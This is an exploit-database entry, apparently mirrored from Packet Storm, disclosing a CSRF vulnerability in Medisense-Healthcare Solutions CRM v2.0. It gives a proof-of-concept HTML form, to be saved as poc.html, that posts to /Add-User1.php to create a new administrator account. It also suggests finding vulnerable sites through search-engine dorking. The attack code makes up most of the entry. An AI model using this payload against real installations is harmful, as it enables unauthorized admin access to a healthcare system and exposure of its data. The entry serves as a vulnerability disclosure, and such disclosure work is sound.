Share
## https://sploitus.com/exploit?id=PACKETSTORM:170445
====================================================================================================================================  
| # Title : Medisense-Healthcare Solutions CRM v2.0 CSRF Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.3(32-bit) |   
| # Vendor : https://medisensecrm.com |   
| # Dork : |  
====================================================================================================================================  
  
poc :  
  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] The following html code create a new admin .  
  
[+] infected file : /Add-User1.php .  
  
[+] save code as poc.html .  
  
<h2>Add New User</h2>  
<form name="frmCreateuser" method="POST" action="https://127.0.0.1/medisensecrmcom/Add-User1.php" onsubmit="return createUser()">  
<h3>User Name :<input type="text" name="txtuser" class="txtfield fr"/></h3>  
<h3>Password :<input type="password" name="txtNewPass" class="txtfield fr"/></h3>  
<h3>Re-type Password :<input type="password" name="txtVerifyPass" class="txtfield fr"/></h3>  
<h3>USer Type:<label class="fr" ><input type="radio" name="usertype" class="rdBtn fr" value="1" checked/>Executive</label><br><label class="fr">  
<input type="radio" name="usertype" value="0" class="rdBtn fr"/>Admin</label></h3>  
<input type="submit" name="cmdSubmit" value="SUBMIT" class="submitBtn" />  
</div>  
</form>  
  
</div>  
  
</div>  
  
Greetings to :=========================================================================================================================  
|  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* |   
|  
=======================================================================================================================================